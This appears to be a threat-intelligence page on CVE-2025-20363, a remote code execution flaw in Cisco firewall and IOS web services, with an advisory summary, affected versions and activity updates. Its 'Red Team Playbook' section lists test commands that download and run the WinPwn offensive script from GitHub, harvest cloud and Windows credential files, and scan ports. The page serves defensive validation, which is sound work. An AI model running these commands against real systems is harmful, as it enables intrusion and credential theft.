CVE-2025-20363
Overview
This vulnerability is a heap-based buffer overflow caused by improper validation of user-supplied input in HTTP requests processed by the web services of Cisco Secure Firewall ASA, FTD, and Cisco IOS platforms. The flaw resides in the HTTP request handling component, which fails to correctly parse and validate certain crafted inputs, leading to memory corruption. Affected components include the web service modules within Cisco IOS, IOS XE, IOS XR, ASA, and FTD software versions.
Vulnerability Description
A vulnerability in the web services of Cisco Secure Firewall Adaptive Security Appliance (ASA) Software, Cisco Secure Firewall Threat Defense (FTD) Software, Cisco IOS Software, Cisco IOS XE Software, and Cisco IOS XR Software could allow an unauthenticated, remote attacker (Cisco ASA and FTD Software) or authenticated, remote attacker (Cisco IOS, IOS XE, and IOS XR Software) with low user privileges to execute arbitrary code on an affected device. This vulnerability is due to improper validation of user-supplied input in HTTP requests. An attacker could exploit this vulnerability by sending crafted HTTP requests to a targeted web service on an affected device after obtaining additional information about the system, overcoming exploit mitigations, or both. A successful exploit could allow the attacker to execute arbitrary code as root, which may lead to the complete compromise of the affected device. For more information about this vulnerability, see the Details ["#details"] section of this advisory.
Impact
An attacker can execute arbitrary code with root-level privileges on affected devices by sending crafted HTTP requests. For Cisco ASA and FTD, this can be done remotely without authentication, while for IOS variants, low-privileged authenticated access is required. Successful exploitation can result in full device compromise, enabling control over network infrastructure, data interception, or disruption of services. The CVSS vector indicates network attack vector (AV:N), high complexity (AC:H), no privileges required (PR:N) for some products, and complete confidentiality, integrity, and availability impact (C:H/I:H/A:H).
Solution
Cisco has released security updates addressing this vulnerability in multiple advisories accessible via https://sec.cloudapps.cisco.com/security/center/content/CiscoSecurityAdvisory/cisco-sa-http-code-exec-WmfP3h3O. Users should upgrade affected Cisco IOS XR versions to the fixed releases beyond 6.6.3, and similarly apply patches to ASA and FTD software as specified in the advisory. No specific workarounds are recommended; timely application of vendor patches is the primary remediation measure.
EPSS vs KEV Prediction — Evolution (30 days)
Full Analysis
A critical vulnerability exists within the web services of multiple Cisco products, including the Secure Firewall Adaptive Security Appliance (ASA) Software, Secure Firewall Threat Defense (FTD) Software, and various versions of Cisco IOS, IOS XE, and IOS XR Software. This vulnerability arises from inadequate validation of user-supplied input in HTTP requests, which can allow unauthorized remote attackers to execute arbitrary code on affected devices. The severity of this flaw is underscored by its high CVSS score of 9.0, indicating a significant risk to the integrity and availability of the systems involved.
Exploitation of this vulnerability can occur through crafted HTTP requests directed at the targeted web services of the affected devices. For Cisco ASA and FTD Software, an attacker does not require authentication, significantly lowering the barrier for exploitation. In contrast, for IOS, IOS XE, and IOS XR Software, an attacker must possess low-level user privileges. This distinction highlights the potential for exploitation in environments where user accounts may be compromised or where users have been granted unnecessary permissions. Successful exploitation can lead to the execution of arbitrary code with root privileges, effectively allowing the attacker to take full control of the device, manipulate configurations, or even pivot to other devices within the network.
The real-world implications of this vulnerability are profound, particularly for organizations that rely on Cisco's networking and security products. A successful attack could lead to unauthorized access to sensitive data, disruption of services, or the establishment of a foothold for further attacks within the network. The potential for data breaches, loss of customer trust, and regulatory repercussions can translate into significant financial losses. Moreover, the ability to execute arbitrary code could enable attackers to deploy malware or ransomware, exacerbating the impact on business operations and reputation.
To detect and mitigate this vulnerability, organizations should implement a multi-faceted approach. Regularly updating and patching affected Cisco software is critical, as vendors typically release updates to address known vulnerabilities. Network monitoring tools can also be employed to detect unusual HTTP request patterns that may indicate an attempted exploitation. Additionally, organizations should enforce strict access controls and user privilege management to limit the potential for exploitation by authenticated users. Conducting regular security assessments and penetration testing can further help identify weaknesses in the network infrastructure and ensure that security measures are effective.
In conclusion, the vulnerability present in Cisco's web services poses a significant threat to network security, with the potential for severe operational and financial consequences. Organizations must prioritize awareness and proactive measures to safeguard their systems against this and similar vulnerabilities. By adopting a comprehensive security strategy that includes timely updates, vigilant monitoring, and robust access controls, businesses can mitigate the risks associated with this critical flaw and enhance their overall cybersecurity posture.
CSURFACE threat intelligence has detected a marked escalation in activity related to CVE-2025-20363, with a notable increase in telemetry signals indicating attempts to exploit this critical vulnerability. Concurrently, the Exploit Prediction Scoring System (EPSS) score for this CVE has risen by nearly 14%, reflecting growing confidence in the likelihood of exploitation in the wild. Although no new exploit techniques or proof-of-concept code have surfaced, the upward trend in detection and EPSS suggests adversaries are increasingly targeting affected Cisco IOS devices. This development elevates the threat posture, signaling that attackers may be refining their methods or expanding their campaigns to leverage this vulnerability. Defenders should interpret this as a heightened risk environment where exploitation attempts are becoming more frequent and potentially more sophisticated, underscoring the urgency for vigilant monitoring and rapid incident response capabilities.
Update 2 — August 15, 2026
CSURFACE threat intelligence has identified a marked escalation in detection activity related to CVE-2025-20363, with our telemetry showing a clear upward trend in exploitation attempts targeting Cisco IOS devices. While the overall exploit prediction scoring remains stable, the doubling of observed triggers indicates adversaries are increasingly probing or attempting to leverage this vulnerability. This escalation is significant because it suggests a growing operational interest and potential refinement of attack techniques, raising the likelihood of successful exploitation in the near term. For defenders, this evolving landscape elevates the threat level from a latent risk to an active concern, necessitating heightened vigilance in monitoring network traffic and device behavior. Although no new exploit variants or proof-of-concept codes have emerged, the intensified activity underscores that threat actors may be preparing for broader or more sophisticated campaigns, which could increase the impact and frequency of attacks exploiting this critical vulnerability.
Affected Products (28)
| Vendor | Product | Version | CPE | |
|---|---|---|---|---|
|
|
Cisco | Ios Xr | 6.5.1 |
cpe:2.3:o:cisco:ios_xr:6.5.1:*:*:*:*:*:x86:*
|
|
|
Cisco | Ios Xr | 6.5.2 |
cpe:2.3:o:cisco:ios_xr:6.5.2:*:*:*:*:*:x86:*
|
|
|
Cisco | Ios Xr | 6.5.3 |
cpe:2.3:o:cisco:ios_xr:6.5.3:*:*:*:*:*:x86:*
|
|
|
Cisco | Ios Xr | 6.6.2 |
cpe:2.3:o:cisco:ios_xr:6.6.2:*:*:*:*:*:x86:*
|
|
|
Cisco | Ios Xr | 6.6.3 |
cpe:2.3:o:cisco:ios_xr:6.6.3:*:*:*:*:*:x86:*
|
|
|
Cisco | Ios Xr | 6.6.25 |
cpe:2.3:o:cisco:ios_xr:6.6.25:*:*:*:*:*:x86:*
|
|
|
Cisco | Ios Xr | 6.7.1 |
cpe:2.3:o:cisco:ios_xr:6.7.1:*:*:*:*:*:x86:*
|
|
|
Cisco | Ios Xr | 6.7.2 |
cpe:2.3:o:cisco:ios_xr:6.7.2:*:*:*:*:*:x86:*
|
|
|
Cisco | Ios Xr | 6.7.3 |
cpe:2.3:o:cisco:ios_xr:6.7.3:*:*:*:*:*:x86:*
|
|
|
Cisco | Ios Xr | 6.8.1 |
cpe:2.3:o:cisco:ios_xr:6.8.1:*:*:*:*:*:x86:*
|
|
|
Cisco | Ios Xr | 6.8.2 |
cpe:2.3:o:cisco:ios_xr:6.8.2:*:*:*:*:*:x86:*
|
|
|
Cisco | Ios Xr | 6.9.1 |
cpe:2.3:o:cisco:ios_xr:6.9.1:*:*:*:*:*:x86:*
|
|
|
Cisco | Ios Xr | 6.9.2 |
cpe:2.3:o:cisco:ios_xr:6.9.2:*:*:*:*:*:x86:*
|
|
|
Cisco | Adaptive Security Appliance Software | All |
cpe:2.3:o:cisco:adaptive_security_appliance_software:*:*:*:*:*:*:*:*
|
|
|
Cisco | Adaptive Security Appliance Software | All |
cpe:2.3:o:cisco:adaptive_security_appliance_software:*:*:*:*:*:*:*:*
|
|
|
Cisco | Adaptive Security Appliance Software | All |
cpe:2.3:o:cisco:adaptive_security_appliance_software:*:*:*:*:*:*:*:*
|
|
|
Cisco | Adaptive Security Appliance Software | All |
cpe:2.3:o:cisco:adaptive_security_appliance_software:*:*:*:*:*:*:*:*
|
|
|
Cisco | Adaptive Security Appliance Software | All |
cpe:2.3:o:cisco:adaptive_security_appliance_software:*:*:*:*:*:*:*:*
|
|
|
Cisco | Adaptive Security Appliance Software | All |
cpe:2.3:o:cisco:adaptive_security_appliance_software:*:*:*:*:*:*:*:*
|
|
|
Cisco | Adaptive Security Appliance Software | All |
cpe:2.3:o:cisco:adaptive_security_appliance_software:*:*:*:*:*:*:*:*
|
Exploits
No exploits found for this CVE.
Threat Feed
5 eventsSighting activity recorded
Sighting activity recorded
Sighting activity recorded
Sighting activity recorded
Sighting activity recorded
Likely Kill Chain
Typical exploitation path inferred from this vulnerability's characteristics — mapped to MITRE ATT&CK tactics.
Kill chain derived from the ML classifier.
Attack Vectors ML
MITRE ATT&CK Techniques (6)
The adversary's likely kill chain after exploiting this CVE — in execution order. Validate each stage with the Red Team Playbook below.
The techniques for this CVE don't apply to this operating system. Switch OS above.
CAPEC Attack Patterns ML
| ID | Name | ML Conf. | Likelihood | Severity | Link |
|---|---|---|---|---|---|
| CAPEC-92 | Forced Integer Overflow |
47%
|
High | High |
Red Team Playbook
33 AtomicRedTeam test(s) mapped to this CVE's kill chain. Use them to validate detections and controls.
AtomicRedTeam has no published tests for this CVE's techniques on this OS. Switch OS above to see other options.
Set-PowerCLIConfiguration -InvalidCertificateAction Ignore -ParticipateInCEIP:$false -Confirm:$false
Connect-VIServer -Server #{vm_host} -User #{vm_user} -Password #{vm_pass}
Get-VMHostService -VMHost #{vm_host} | Where-Object {$_.Key -eq "TSM-SSH" } | Start-VMHostService -Confirm:$false
echo "" | "#{plink_file}" -batch "#{vm_host}" -ssh -l #{vm_user} -pw "#{vm_pass}" "vim-cmd hostsvc/enable_ssh"
docker build -t t1046 $PathToAtomicsFolder/T1046/src/
docker run --name t1046_container --rm -d -t t1046
docker exec t1046_container /scan.sh
for port in {1..65535}; do (2>/dev/null echo >/dev/tcp/#{host}/$port) && echo port $port is open ; done
nmap #{host_to_scan}
sudo nmap -sS #{network_range} -p #{port}
telnet #{host} #{port}
nc -nv #{host} #{port}
nmap -Pn -sV -p #{port_range} #{host}
python "#{filename}" -i #{host_ip}
$ipAddr = "#{ip_address}"
if ($ipAddr -like "*,*") {
$ip_list = $ipAddr -split ","
$ip_list = $ip_list.ForEach({ $_.Trim() })
Write-Host "[i] IP Address List: $ip_list"
$ports = #{port_list}
foreach ($ip in $ip_list) {
foreach ($port in $ports) {
Write-Host "[i] Establishing connection to: $ip : $port"
try {
$tcp = New-Object Net.Sockets.TcpClient
$tcp.ConnectAsync($ip, $port).Wait(#{timeout_ms}) | Out-Null
} catch {}
if ($tcp.Connected) {
$tcp.Close()
Write-Host "Port $port is open on $ip"
}
}
}
} elseif ($ipAddr -notlike "*,*") {
if ($ipAddr -eq "") {
# Assumes the "primary" interface is shown at the top
$interface = Get-NetIPInterface -AddressFamily IPv4 -ConnectionState Connected | Select-Object -ExpandProperty InterfaceAlias -First 1
Write-Host "[i] Using Interface $interface"
$ipAddr = Get-NetIPAddress -AddressFamily IPv4 -InterfaceAlias $interface | Select-Object -ExpandProperty IPAddress
}
Write-Host "[i] Base IP-Address for Subnet: $ipAddr"
$subnetSubstring = $ipAddr.Substring(0, $ipAddr.LastIndexOf('.') + 1)
# Always assumes /24 subnet
Write-Host "[i] Assuming /24 subnet. scanning $subnetSubstring'1' to $subnetSubstring'254'"
$ports = #{port_list}
$subnetIPs = 1..254 | ForEach-Object { "$subnetSubstring$_" }
foreach ($ip in $subnetIPs) {
foreach ($port in $ports) {
try {
$tcp = New-Object Net.Sockets.TcpClient
$tcp.ConnectAsync($ip, $port).Wait(#{timeout_ms}) | Out-Null
} catch {}
if ($tcp.Connected) {
$tcp.Close()
Write-Host "Port $port is open on $ip"
}
}
}
} else {
Write-Host "[Error] Invalid Inputs"
exit 1
}
Get-Service -Name "Remote Desktop Services", "Remote Desktop Configuration"
iex(new-object net.webclient).downloadstring('https://raw.githubusercontent.com/S3cur3Th1sSh1t/WinPwn/121dcee26a7aca368821563cbe92b2b5638c5773/WinPwn.ps1')
MS17-10 -noninteractive -consoleoutput
iex(new-object net.webclient).downloadstring('https://raw.githubusercontent.com/S3cur3Th1sSh1t/WinPwn/121dcee26a7aca368821563cbe92b2b5638c5773/WinPwn.ps1')
bluekeep -noninteractive -consoleoutput
iex(new-object net.webclient).downloadstring('https://raw.githubusercontent.com/S3cur3Th1sSh1t/WinPwn/121dcee26a7aca368821563cbe92b2b5638c5773/WinPwn.ps1')
fruit -noninteractive -consoleoutput
iex(new-object net.webclient).downloadstring('https://raw.githubusercontent.com/S3cur3Th1sSh1t/WinPwn/121dcee26a7aca368821563cbe92b2b5638c5773/WinPwn.ps1')
spoolvulnscan -noninteractive -consoleoutput
Start-Process -FilePath "#{autoit_path}" -ArgumentList "#{script_path}"
echo "Creating %systemroot%\wpbbin.exe"
New-Item -ItemType File -Path "$env:SystemRoot\System32\wpbbin.exe"
type C:\Windows\Panther\unattend.xml
type C:\Windows\Panther\Unattend\unattend.xml
python2 laZagne.py all
grep -ri password #{file_path}
exit 0
findstr /si pass *.xml *.doc *.txt *.xls
ls -R | select-string -ErrorAction SilentlyContinue -Pattern password
find #{file_path}/.aws -name "credentials" -type f 2>/dev/null
find #{file_path}/.azure -name "msal_token_cache.json" -o -name "accessTokens.json" -type f 2>/dev/null
find #{file_path}/.config/gcloud -name "credentials.db" -o -name "access_tokens.db" -type f 2>/dev/null
find #{file_path}/.oci/sessions -name "token" -type f 2>/dev/null
for file in $(find #{file_path} -type f -name .netrc 2> /dev/null);do echo $file ; cat $file ; done
dir /a:h C:\Users\%USERNAME%\AppData\Local\Microsoft\Credentials\
dir /a:h C:\Users\%USERNAME%\AppData\Roaming\Microsoft\Credentials\
$usernameinfo = (Get-ChildItem Env:USERNAME).Value
Get-ChildItem -Hidden C:\Users\$usernameinfo\AppData\Roaming\Microsoft\Credentials\
Get-ChildItem -Hidden C:\Users\$usernameinfo\AppData\Local\Microsoft\Credentials\
iex(new-object net.webclient).downloadstring('https://raw.githubusercontent.com/S3cur3Th1sSh1t/WinPwn/121dcee26a7aca368821563cbe92b2b5638c5773/WinPwn.ps1')
SharpCloud -consoleoutput -noninteractive
iex(new-object net.webclient).downloadstring('https://raw.githubusercontent.com/S3cur3Th1sSh1t/WinPwn/121dcee26a7aca368821563cbe92b2b5638c5773/WinPwn.ps1')
sessionGopher -noninteractive -consoleoutput
iex(new-object net.webclient).downloadstring('https://raw.githubusercontent.com/S3cur3Th1sSh1t/WinPwn/121dcee26a7aca368821563cbe92b2b5638c5773/WinPwn.ps1')
Snaffler -noninteractive -consoleoutput
iex(new-object net.webclient).downloadstring('https://raw.githubusercontent.com/S3cur3Th1sSh1t/WinPwn/121dcee26a7aca368821563cbe92b2b5638c5773/WinPwn.ps1')
passhunt -local $true -noninteractive
iex(new-object net.webclient).downloadstring('https://raw.githubusercontent.com/S3cur3Th1sSh1t/WinPwn/121dcee26a7aca368821563cbe92b2b5638c5773/WinPwn.ps1')
powershellsensitive -consoleoutput -noninteractive
iex(new-object net.webclient).downloadstring('https://raw.githubusercontent.com/S3cur3Th1sSh1t/WinPwn/121dcee26a7aca368821563cbe92b2b5638c5773/WinPwn.ps1')
sensitivefiles -noninteractive -consoleoutput
Detection & Response Rules
No detection or response rules found for this CVE.
No news articles found for this CVE.
References (2)
| Title | Tags | URL |
|---|---|---|
| nvd.nist.gov |
NVD
reference
|
https://nvd.nist.gov/vuln/detail/CVE-2025-20363 |
| sec.cloudapps.cisco.com |
GitHub CVE
|
https://sec.cloudapps.cisco.com/security/center/content/CiscoSecurityAdvisory/cisco-sa-http-code-exec-WmfP3h3O |